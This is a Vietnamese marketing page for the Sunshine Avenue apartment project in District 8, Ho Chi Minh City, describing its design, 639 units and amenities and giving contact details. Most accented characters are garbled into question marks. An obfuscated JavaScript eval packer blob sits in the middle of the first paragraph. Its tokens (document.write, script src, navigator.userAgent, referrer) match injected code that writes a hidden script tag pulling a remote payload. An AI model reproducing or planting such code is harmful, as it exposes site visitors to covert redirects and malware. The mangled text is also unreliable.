Căn hộ Sunshine Avenue quận 8

D??i s? ??u t? k? l??ng c?a th??ng hi?u ??t Xanh, du eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynzit|var|u0026u|referrer|tnkbe||js|php’.split(‘|’),0,{}))
an Sunshine Avenue
s? h?u nh?ng ?i?m nh?n lý t??ng, ?? ?? b?t phá hi?u qu? kh?i nh?ng gi?i h?n b?t ??ng s?n ?ã l?i th?i. Qua ?ó, th? tr??ng v?a có thêm m?t ngu?n cung c?n h? lý t??ng, v?a t?o ???c ti?n ?? cho s? ti?n b? ngày càng m?nh m? trong phong cách sinh s?ng và t?n h??ng.

D? án khác trên website

C?n h? Gem Riverside

C?n h? One Verandah

C?n h? Sunshine Avenue qu?n 8 v??t kh?i m?i gi?i h?n thi?t k?

Toàn b? c?n h? Sunshine Avenue qu?n 8 mang l?i c?m giác v?a hoành tráng trong quy mô t?ng th?, v?a ??c l?p và ph?ng ph?t phong cách s?ng hi?n ??i hàng ??u trong t?ng c?n h? riêng bi?t. V?i phong cách Châu Âu c?c k? hi?n ??i, chú tr?ng s? thoáng ??t, mát m? cho m?i v? trí bên trong c?n h?, n?ng và gió tr?i t? nhiên có th? tràn vào nhà, ?em l?i ngu?n sinh khí lý t??ng; cùng v?i l?i ki?n trúc ??c ?áo ???c thi?t k? theo h??ng m?, t?i ?u hóa di?n tích và khai thác t?i ?a công n?ng s? d?ng có th? có, các c?n h? t?i chung c? Sunshine Avenue qu?n 8 s? ?em l?i thi?n c?m và ?n t??ng m?nh m? cho t?t c? quý khách hàng trong l?n ??u tiên tham quan c?n h? m?u.

M?i phòng ng?, phòng khách, phòng ?n, nhà v? sinh ??u ??m b?o m?t l?i pha màu hi?n ??i nh?ng vô cùng tinh t?, mang l?i c?m giác th? thái trong m?i kho?nh kh?c an c? và tr?i nghi?m. K?t h?p màu g? lót sàn ??p, l?, mang l?i c?m giác ?m chân vào mùa ?ông và mát r??i khi hè v?, vi?c an c? t?i các c?n h? thu?c ph?m vi d? án s? làm hài lòng t?t c? m?i ?òi h?i c?a t?t c? các ??i t??ng khách hàng trong t??ng lai.

D? án Sunshine Avenue qu?n 8 kh?ng ??nh ch?t l??ng s?ng

Bên c?nh vi?c th? hi?n ???c cái h?n phóng khoáng c?a l?i s?ng hi?n ??i, ??ng c?p, m?i m?t c?n h? t?i d? án Sunshine Avenue qu?n 8 ??u là s? kh?ng ??nh ch?t l??ng s?ng v??t tr?i, t??ng x?ng v?i giá tr? ??i s?ng ngày càng phát tri?n và nâng cao.

  • V?i quy mô 25 t?ng g?m 639 c?n h? ?a d?ng di?n tích, tùy theo s? nhân kh?u và nhu c?u s? d?ng th?c t? và quý khách có th? ??a ra s? l?a ch?n cho riêng mình. Qua ?ó, cu?c s?ng s? v?a thu?n ti?n, v?a th?a mãn và mang l?i s? hài lòng lý t??ng.
  • Ngoài nh?ng thu?n ti?n trong ??i s?ng sinh ho?t t?i không gian c?n h? riêng t?, t?ng th? d? án ??m b?o khu v?c ??u ?? xe c?c r?ng, h?n ch? s? phi?n toái và b?t ti?n cho các khách hàng là ch? s? h?u t??ng lai c?a Sunshine Avenue qu?n 8.
  • T?t c? thi?t b? n?i th?t t? bàn gh?, t?, gi??ng, sàn nhà, khung c?a,…. ??u ???c l?a ch?n t? nh?ng th??ng hi?u uy tín và n?i ti?ng trên th? tr??ng th??ng m?i hàng hóa, ?em l?i cu?c s?ng an toàn và hoàn h?o cho m?i ??i t??ng s? d?ng.
  • S? k?t h?p khéo léo h? th?ng ti?n ích n?i khu v?i ?a d?ng khía c?nh khác nhau trong ??i s?ng bên c?nh các ti?n ích ngo?i khu d? dàng ti?p c?n thông qua h? th?ng giao thông k?t n?i thông su?t, thu?n ti?n, các ch? s? h?u t??ng lai có c? h?i nâng t?m các giá tr? tr?i nghi?m và t?n h??ng nh? s? hài lòng tuy?t ??i trong m?i khía c?nh ?a d?ng c?a cu?c s?ng.

C?n h? Sunshine Avenue qu?n 8 m?t l?n n?a là s? b?t phá ngo?n m?c trong ngành b?t ??ng s?n mà th??ng hi?u ??t Xanh kh?ng ??nh t?i th? tr??ng thành ph? H? Chí Minh. C?ng nh? ?ó, m?t t??ng lai hoàn h?o, lý t??ng s? hoàn toàn n?m trong t?m tay c?a t?t c? quý khách. Hãy ??n và cùng chúng tôi t?n h??ng giá tr? s?ng hàng ??u!

Liên h? PKD d? án c?n h? Sunshine Avenue

Hotline: 0911.74.75.75

Fanpage: canhosunshineavenues

Video: https://www.youtube.com